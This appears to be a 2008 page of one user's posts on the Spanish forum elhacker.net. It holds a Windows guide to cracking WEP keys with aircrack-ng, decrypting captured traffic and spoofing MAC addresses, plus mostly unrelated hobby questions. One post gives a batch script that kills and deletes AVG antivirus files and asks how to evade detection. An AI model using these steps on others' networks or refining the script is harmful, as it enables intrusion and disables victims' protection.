elhacker.net cabecera Bienvenido(a), Visitante. Por favor Ingresar o Registrarse
¿Perdiste tu email de activación?.

 

 


Tema destacado: Como proteger una cartera - billetera de Bitcoin


  Mostrar Temas
Páginas: 1 2 3 4 [5] 6 7
41  Media / Diseño Gráfico / Un buen programa para dibujar manga... en: 30 Mayo 2008, 04:14 am
Eso.. ando en busca de un buen programa para dibujar manga y eso... Me he hecho con el manga estudio debut 3 pero no le cacho, osea se me hace complicado jeje, me recomiendan alguno?
42  Media / Multimedia / Hacer que mi tarjeta de sonido se comporte como 2 en: 28 Mayo 2008, 22:53 pm
Pues me vino esta loca idea a la cabeza.

Tengo una laptop y la tarjeta de sonido es integrada al mainboard obviamente, la cuestion es que consta de los parlantes y los audífonos. Osea el sonido sale por defecto por los parlantes pero cuando conecto los audífonos los parlantes se enmudecen y el sonido sale por los audífonos.

Lo que quiero saber es si es posible hacer que los parlantes y audífonos se comporten como 2 tarjetas de sonido separadas, osea yo esuchar algo por los audífonos mientras que se escucha otra cosa por los parlantes? Esto para usar con el Adobe Audition.

Ahi va mi idea loca. :xD
43  Seguridad Informática / Wireless en Windows / Manual Hacking Wireless en Windows XP usando la suite aircrack en: 20 Mayo 2008, 04:13 am
Bueno pues me he decido a hacer este manual porque veo que la mayoría de info. que se puede encontrar es más para linux, y como no me gusta la discriminación :P

Este manual está pensado para novatos ok? :xD

1. ¿Qué necesitamos para hacking wireless en Windows?

Ya se lo ha mencionada varias veces, pero vale la pena repetir. La marca de la tarjeta inalambrica que usemos es irrelevante, lo que realmente importa es su chipset.

Citar
Lo importante de una tarjeta WIFI es el chipset. Dá igual la marca, lo que en realidad importa es el chipset. En esta página podéis consultar los chipsets de vuestras tarjetas:

http://linux-wless.passys.nl/

Entramos al link que nos da el amigo Uxio para averiguar cual es el chipset que usa nuestra tarjeta.

Citar
Después comprobad lo que se puede hacer con vuestro chipset:

http://hwagm.elhacker.net/htm/traduccion.htm#q080

Le hacemos caso y entramos al link para comprobar lo que puede hacer nuestro chipset y si es compatible con Windows. (Si no lo es pues ni modo tendremos que usar linux. :( :P)

En mi caso el chipset de mi tarjeta es una atheros ar5005g, perfectamente compatible. :D

2. Descargando e instalando los drivers

Llegado este punto debemos ponernos a buscar los drivers:

http://hwagm.elhacker.net/ultimos.htm

En mi caso el primer link funcionará a la perfección. ::)

EDITADO: Los drivers de Omnipeek dejaron de estar disponibles por medio del ftp de wildpackets, pero tienes este post para una recopilación de drivers:
http://foro.elhacker.net/wireless_en_windows/recopilacion_de_drivers_omnipeek_wildpackets-t239852.0.html

Para instalar los drivers en windows, un manual muy detallado aquí:

http://hwagm.elhacker.net/windriver/monitordriver.htm

No olvidar hacer respaldo de los drivers anteriores! Solo por si acaso. Procedemos a seguir el manual. ;D





Listooooo, ya tenemos instalados los drivers, podemos empezar. ::)

3. Bajando y usando la suite aircrack

Procedemos a bajar la suite aircrack:

http://hwagm.elhacker.net/aircrack-ng.htm

Esta vez utilizaremos la Aircrack-ng 0.9.3, para Windows recuerden :¬¬

La suite viene comprimida, la descomprimimos en cualquier lugar, ingresamos la carpeta bin, ejecutamos el Aircrack-ng GUI.exe, este será nuestro centro de mando.

Ahora vamos a la pestaña Airodump-ng, Airodump es el programa que nos permitirá capturar. Pulsamos "Launch" para iniciar el Airodump.



Nos preguntará si necesitamos instalar los drivers de omnipeek, le decimos que no porque ya los tenemos instalados. :P Ahora saldrá otro mensaje diciéndonos que nos falta los archivos PEEK.DLL y PEEK5.SYS, no hay problema, le damos clic a Yes y nos lleva a la página para bajarlos:

http://www.tuto-fr.com/tutoriaux/crack-wep/fichiers/wlan/en-index.php

Especificamente la que dice peek.zip, aqui el link directo:

http://www.tuto-fr.com/tutoriaux/crack-wep/fichiers/wlan/winxp/Peek.zip

Una vez que tenemos el zip lo descomprimimos y copiamos los archivos en la carpeta bin.

4. Capturando

Ahora sí lanzamos de nuevo el Airodump:



Explicaré cada una de las opciones que nos da:

Primero nos sale una lista con las tarjetas de red que tengamos instaladas:

Código:
Known network adapters:

11 Atheros AR5005G Cardbus Wireless Network Adapter
 2 NIC Fast Ethernet PCI Familia RTL8139 de Realtek

Network interface index number ->

En mi caso salen la Atheros y la Realtek que es para la red cableada. Escojemos el numero de la tarjeta correspondiente, en mi caso "11" y Enter.

Código:
Interface types: 'o' = HermesI/Realtek
 'a' = Aironet/Atheros

Network interface type (o/a) ->

Nos pide la interface, en mi caso "a" por Atheros. Enter.

Código:
Channel(s): 0 = hop on 2.4Ghz channels, -1 = hop on 5Ghz channel,
 1, 7, 13, 2, 8, 3, 14, 9, 4, 10, 5, 11, 6, 12, 36, 40,
 44, 48, 52, 56, 60, 64, 100, 104, 108, 112, 116, 120,
 124, 128, 132, 136, 140, 149, 153, 157, 161, 184, 188,
 192, 196, 200 ->

Los canales que podemos capturar, si sabemos en que canal está siendo transmitida nuestra red inalámbrica pues lo especificamos, sino podemos especificar para que capture varios a la vez con 0 y -1.

Código:
(note: if you specify the same output prefix, airodump will resume
 the capture session by appending data to the existing capture file)

Output filename prefix ->

Aquí especificamos el nombre del archivo en donde almacenaremos nuestra captura, en mi caso le puse "captura" :xD Cabe mencionar de que si especificamos el mismo nombre de un archivo que ya existe la captura será continuada y se agregaran los datos al archivo.

Código:
(note: to save space and only store the captured WEP IVs, press y.
 The resulting capture file will only be useful for WEP cracking)

Only write WEP IVs (y/n) ->

Esta opción... pongámoslo así: Si eliges "y" el archivo que se generará será de extención .ivs (captura.ivs" y solo guardará los datos necesarios para crackear la clave wep. Si le ponemos "n" pues en el archivo se guardará todo lo que se capture, paquetes y todo. Esta opción se da con el objeto de ahorrar espacio en disco si lo único que vamos a hacer es crackear la wep, pero como necesitamos los otros datos para más adelante le ponemos "n". Enter y empezamos a capturar.



En la parte de arriba nos dirá los AP que estén al alcance, el BSSID será la mac, y en donde dice ENC (cifrado) vemos que nos sale OPN, eso significa que es una red abierta, si tuviera clave Wep diría WEP. En la parte de abajo vemos las estaciones que están conectadas al AP con sus respectivas macs y todo lo que se captura se está llendo al fichero "captura.cap" dentro de la carpeta bin de la suite aircrack.

Para cerrar el Airodump aplastamos Ctrl+C

5. Sacando la wep

Para sacar una clave wep normalmente necesitamos capturar al menos un millon de ivs, sin embargo a veces lo podemos lograr con menos (o con más, depende de la dificultad de la clave).

Una vez que tengamos al pelo nuestro archivo .ivs o .cap con las suficientes ivs vamos de nuevo al aircrack-ng GUI en la pestaña de "Aircrack-ng", ponemos examinar y escogemos nuestro archivo, para empezar el ataque ponemos Launch



Mi caso es un caso especial porque he usado una wep muy facil que he podido sacarla con 79353 ivs, esto por motivos de tiempo, pero nunca se conformen con tan poco. Si el archivo guarda informacion de diferentes AP pues nos dara a escoger, en mi caso pondré el 1 y empezamos el ataque y con algo de suerte:



Hemos encontrado nuestra primera clave wep ::)

6. Recordando nuestras claves con WZCook

Otra de las pestañas en el Aircrack-ng GUI es el WZCook, este no es un programa para hacking wireless, más bien es una herramienta para recordar la clave wep o wpa de las redes a las que alguna vez en nuestra vida nos hemos conectado con windows (siempre y cuando no hayamos formateado claro está).



En caso de que sea una red abierta (sin cifrado) nos pondrá 00000000, etc...

Esta ha sido una pausa para seguir explicando el resto, siempre es bueno tener en cuenta esta utilidad muy útil. :P

7. descifrando nuestra captura

Ahora introducimos el uso de otro programa que nos servirá de mucho en el mundo del hacking wireless, este es el ethereal

http://www.ethereal.com/

No se por qué pero parece que la página no va :-\ Pero bueno les he subido el rar aquí:

http://rapidshare.com/files/116436179/ethereal-setup-0.99.0.rar

 ;D

Ethereal es un programa que nos servirá para analizar los paquetes que hemos capturado. Todo el trafico de la red ante nuestros ojos sí! Recuerdan nuestro archivo "captura.cap" contiene información sobre la red, pero esperen... está cifrada! eso quiere decir que aunque abramos nuestro archivo con el ethereal los paquetes no serán legibles, intentemos una vez teniendo instalado el ethereal abrir nuestro archivo "captura.cap"



mmm... nada que ya no hemos visto... A lo mucho podemos ver el ssid de la red y las mac del ap y los clientes.

Ahora vamos a descifrar nuestro archivo para hacerlo legible, para eso usaremos otras de las pestañas el Aircrack-ng GUI, la llamada Airdecap

Airdecap nos permitirá descifrar nuestro archivo de captura, en el cuadro de texto de Filename ponemos la direccion de nuestro archivo "captura.cap". Tenemos la opcion de especificar el ESSID o el BSSID en caso de que nuestro archivo contenga info de algunas redes. En la parte de abajo escogemos si es calve wep o wpa y por último escribimos la clave en formato hexadecimal. Recordemos que el aircrack nos la da de dos formas, la hex y ascii, esta vez utilizaremos la hex de más arriba (6E:75:65:76:65), ponemos "launch" y el airdecap hará su trabajo.



En Number of decrypted WEP packets nos pondrá cuantos paquetes se han descifrado con éxito, si todo va bien debería ser el mismo número de Total number of WEP data packets, aunque si hemos capturado datos de diferentes redes nos pondra un numero menor, si te da 0 es porque has puesto mal la clave.

Si ha salido bien vemos en la carpeta donde estaba el archivo "captura.cap" y notaremos que se ha generado otro llamado "captura-dec.cap", que es precisamente el archivo de captura ya descifrado.

8. Solucionando DHCP deshabilitado

¿Qué es dhcp deshabilitado? Bueno, creo que este es el tema que más se habla dentro del mundo del hacking wireless.

Citar
DHCP (sigla en inglés de Dynamic Host Configuration Protocol) es un protocolo de red que permite a los nodos de una red IP obtener sus parámetros de configuración automáticamente. Se trata de un protocolo de tipo cliente/servidor en el que generalmente un servidor posee una lista de direcciones IP dinámicas y las va asignando a los clientes conforme éstas van estando libres, sabiendo en todo momento quién ha estado en posesión de esa IP, cuánto tiempo la ha tenido y a quién se la ha asignado después.

http://es.wikipedia.org/wiki/DHCP

El que el dhcp esté deshabilitado significa que aunque tengamos bien la clave wep y nos podamos asociar a la red, está no nos asignará automáticamente una dirección IP, la tendremos que configurar nosotros mismos manualmente.

Les menciono que le mejor manual sobre dhcp deshabilitado es el de Uxío, y se encuentra aquí:

http://www.elhacker.net/solucion-dhcp-deshabiitado.html

Sin embargo hace uso de linux, por lo que yo haré aquí una adaptación del manual para que sea 100% Windows. :)

¿Cómo reconocemos que la red tiene dhcp deshabilitado? Fácil, nos podemos asociar a la red pero no nos dara ip, por lo que nos saldrá el famoso "Conexión limitada o nula":



Ok, no hay problema, para todo hay solución. ::)

Recordemos que tenemos el archivo captura-dec.cap que tiene los paquetes ya descifrados. Vamos a analizarlo con el Ethereal. Simplemente le damos doble clic al archivo (al instalar el Ethereal asocia los archivos .cap al programa automáticamente).

Voy a tomarme el atrevimiento de postear una de las imagenes del manual de Uxío, al fin de cuentas el ehtereal de windows es lo mismo que el de linux:



El amigo Uxío nos lo explica muy bien, yo no podría haberlo hecho mejor. Creo que no tiene sentido seguir escribiendo el resto del manual porque ya lo tenemos bien explicado, el resto en windows, recuerden el manual está aquí: http://www.elhacker.net/solucion-dhcp-deshabiitado.html

El Look@lan aquí:

http://www.lookatlan.com/

9. Filtrado Mac

Yo les doy todo masticado:

Citar
En redes de computadoras la dirección MAC (Medium Access Control address o dirección de control de acceso al medio) es un identificador de 48 bits (6 bytes) que corresponde de forma única a una tarjeta o interfaz de red. Es individual, cada dispositivo tiene su propia dirección MAC determinada y configurada por el IEEE (los últimos 24 bits) y el fabricante (los primeros 24 bits) utilizando el OUI. La mayoría de los protocolos que trabajan en la capa 2 del modelo OSI usan una de las tres numeraciones manejadas por el IEEE: MAC-48, EUI-48, y EUI-64 las cuales han sido diseñadas para ser identificadores globalmente únicos. No todos los protocolos de comunicación usan direcciones MAC, y no todos los protocolos requieren identificadores globalmente únicos.

http://es.wikipedia.org/wiki/Direcci%C3%B3n_MAC

Para saber cual es la dirección mac de nuestros dispositivos de red haremos desde el símbolo del sistema:

Código:
ipconfig/all

(Anotamos la de la wireless, solo por si acaso. :P

Ahora en la seguridad de redes inalámbricas existe el Filtrado Mac, lo que quiere decir que el ap solo dejará asociarse a él equipos específicos que cuenten con "cierta" dirección mac.

Pero ya lo dije, para todo hay solución.

http://www.ntsecurity.nu/toolbox/etherchange/

Ethercange es una pequeña utilidad que nos ayudará a cambiar nuestra mac. simplemente lo ejecutamos y nos mostrará los dispositivos de red que tenemos:



Código:
EtherChange 1.1 - (c) 2003-2005, Arne Vidstrom
 - http://ntsecurity.nu/toolbox/etherchange/

0. Exit
1. NIC Fast Ethernet PCI Familia RTL8139 de Realtek
2. Atheros AR5005G Cardbus Wireless Network Adapter

Pick a network adapter:

En mi caso escojo el número 2, que el de mi atheros.

Código:
0. Exit
1. Specify a new ethernet address
2. Go back to the built-in ethernet address of the network adapter

Pick an action:

La opción 1 es para cambiar la mac a la que queramos, la 2 es para regresar a la mac original del dispositivo.

Código:
Specify a new ethernet address (in hex without separators):

Aquí ponemos la nueva dirección (sin los dos puntos [:]).

¿Cómo saber que direccion mac poner? Pues nos vamos a capturar de nuevo paquetes con el airodump y cogemos una de los clientes, asi de simple, es raro el caso en el que se presenta conflictos por tener la misma mac address que otro equipo en una red.

10. Inyección de tráfico

---Esta sección está en construcción---

11. Cracking wpa

---Esta sección está en construcción---

12. ¿Cómo protegerse?

El propósito del hacking ético es principalmente hacer conciencia a las personas para que se sepan proteger, y el hacking wireless no es la excepción. Para los métodos expuestos en este manual hay formas de mantenerse relativamente seguro, y éstas las expongo a continuación:

- Encripación

El ataque estadístico que hace el aircrack es sólamente efectivo para cifrado WEP, haciéndolo totalmente vulnerable. Hablando de WPA y WPA2, si son PSK son vulnerables a ataques por fuerza bruta, que aunque eso haga a wpa/wpa2 más segura que wep no es lo suficientemente segura. Si queremos que nuestra red inalámbrica se mantenga segura lo mínimo que deberíamos tener es una cifrado WPA, preferiblemente que no sea PSK, cambiar la clave periódicamente y no poner claves demasiado fáciles que puedan estar incluidas en un diccionario.

- Dhcp

La desactivación del dhcp por lo expuesto en este manual no es una gran protección que digamos, pero siempre conviene manterlo desactivado para así al menos darle un problema más en que pensar al atacante.

- Filtrado MAC

Al día de hoy no hay manera totalmente efectiva para protegerse contra el MAC Spoofing, aunque por algunos mensajes expuestos en este foro sabemos que algunos routers inalámbricos probocan algún tipo de conflicto cuando 2 pcs tienen la misma mac. Al momento no sabemos qué routers específicamente hacen esto, pero si alguien le ha pasado esto y está completamente seguro puede mandarme un privado para incluir el modelo y marca de router que tenga este tipo de protección. Dicho eso sabemos que también es algo relativamente conveniente el que tengamos el filtrado MAC activado.

---Esta sección está en construcción---

13. Corrección de errores comunes en la utilización de aircrack

- Al ejecutar Aircrack-ng GUI.exe me sale el siguiente error: La aplicación no se ha podido inicializar correctamente (0xc0000135). Haga clic en Aceptar para terminar la aplicación.



Causa: La gui de aircrack está compilada en la plataforma .net así que para poder ejecutarla necesitamos el .net framework 2.0 de Microsoft.

Solución: Descargar e instalar el .net framwork 2.0 de la siguiente página: http://www.microsoft.com/downloads/details.aspx?displaylang=es&FamilyID=0856eacb-4362-4b0d-8edd-aab15c5e04f5


Eso es todo por hoy, estare investigando más para ver si agrego más información. Saludos. ;)
44  Programación / Scripting / Que no detecten mi av-killer hecho en batch... en: 10 Mayo 2008, 21:51 pm
Estoy empezando en batch y escribí el código de un av-killer muy simple :xD

Ahí está:

Código:
@echo off
taskkill /f /im avgamsvr.exe
taskkill /f /im avgcc.exe
taskkill /f /im avgemc.exe
taskkill /f /im avgupsvc.exe
cd %programfiles%\Grisoft\AVG7
del *.exe
exit

Bueno, la cosa es que el avg me lo detecta y me niega el acceso al archivo (ni siquiera para editarlo). He probado con un .bat compiler, pero lo que hace es un .exe que crea el .bat en una carpeta temporal y lo ejecuta, con lo que obviamente el avg lo detecta al tiempo de la ejecución.

¿Hay alguna forma de mejorar el código de forma que no lo detecte el avg?
Graciasssss....

Carloswaldo :)
45  Foros Generales / Sugerencias y dudas sobre el Foro / Reorganización en Desafíos - Wargames en: 25 Abril 2008, 00:46 am
Ya se mencionó en otro post pero aquí lo replanteo. Propongo una re-organización en el foro de Desafíos - Wargames, mi idea sería que quede algo así:

Desafíos - Warzone
    Otros Wargames
    Acertijos

Desafíos - Warzone será el foro principal. En él irían las pruebas del Warzone de elhacker.net además de otros desafíos que se propongan.

Otros Wargames será un subforo en donde vayan los Wargames de otras páginas, esta vez para mantenerlo mejor organizado cada prueba se tratará en un post por separado y se crearía un post fijado con un índice de las pruebas, una vez que se vayan tratando.

Acertijos será el segundo subforo, ya que el foro se ha vuelto popular por los diferentes acertijos y pruebas matemáticas que proponen los usuarios, en este iría todo eso.

Por supuesto para que todo quede bien organizado se necesitarán moderadores. Por mi parte me ofrezco pero eso ya queda a decisión del Adm.

Ahí va mi propuesta. :)
46  Informática / Tutoriales - Documentación / Traducción de manuales, proyectos, etc... en: 22 Abril 2008, 21:39 pm
Traducción de manuales, proyectos, etc

En proceso:

2 documentos.

Traducidos:

man samba
Traducido por: Carloswaldo
Revisado por: GroK, skan

Desde ahora en adelante las peticiones de traducción se postearán en:
http://foro.elhacker.net/sugerencias_y_dudas_sobre_el_foro/para_los_interesados_en_el_proyecto_de_traduccion_de_manuales_y_textos-t218708.0.html

Se trabajará en ellos internamente y se publicarán en el subforo de Tutoriales una vez terminados.
47  Media / Juegos y Consolas / Jugar con las civilizaciones de Warchiefs en Asian Dynasties (AoE III) en: 2 Marzo 2008, 03:30 am
Tengo instalados el AoE III + la expansion The Warchiefs y la expansion The Asian Dynasties... el problema es que cuando voy a jugar en Asian Dynasties no me salen las civilizaciones de The Warchiefs, eso es a proposito o hay alguna forma de hacerlo?
48  Media / Multimedia / Doble audio? en: 28 Febrero 2008, 21:39 pm
Me baje un video de internet de una serie japonesa, cuando lo voy a ver en el Wmp se escucha del asco, me sale doble audio, el que es español latino y en japones al mismo tiempo osea que no se puede escuchar bien ni lo uno ni lo otro, sin embargo cuando lo abro con el winamp me va bien con el audio latino solamente que es como deberia ser. Alguna idea de por que ocurre esto y como lo puedo solucionar en el wmp?
49  Foros Generales / Sugerencias y dudas sobre el Foro / Dejar de notificarme sobre ciertos temas en: 25 Febrero 2008, 21:46 pm
cuando voy aca:

http://foro.elhacker.net/index.php?action=unreadreplies

siempre me salen algunos post populares que desearia que ya no se me notifiquen de ellos, como "Presentate aqui si eres nuevo" "Sus escritorios" "Unlock de varios modelos de nokia"...

como le hago?
50  Foros Generales / Sugerencias y dudas sobre el Foro / Mensajes mios que desaparecen? en: 18 Febrero 2008, 22:11 pm
en las ultimas 24 horas he notado que diferentes mensajes que he posteado en diferentes secciones del foro han desaparecido, osea, han sido borrados o yo que se :-\ y la cosa es que no creo que haya incumplido con alguna norma y si es asi porfavor decidmelo al que los borro

recuerdo uno que fue en el post de edad de los del foro... mi mensaje ya no esta

otro fue en desafios y retos, un reto de Ferchu en el que puse una opinion y tampoco esta, y lo que postee no era nada que ver con la respuesta del reto

y otros mas que no recuerdo

en fin, no se que pasa, el que me ha borrado mis mensajes (por que no pudieron borrarse solos) que me explique :-\
Páginas: 1 2 3 4 [5] 6 7
WAP2 - Aviso Legal - Powered by SMF 1.1.21 | SMF © 2006-2008, Simple Machines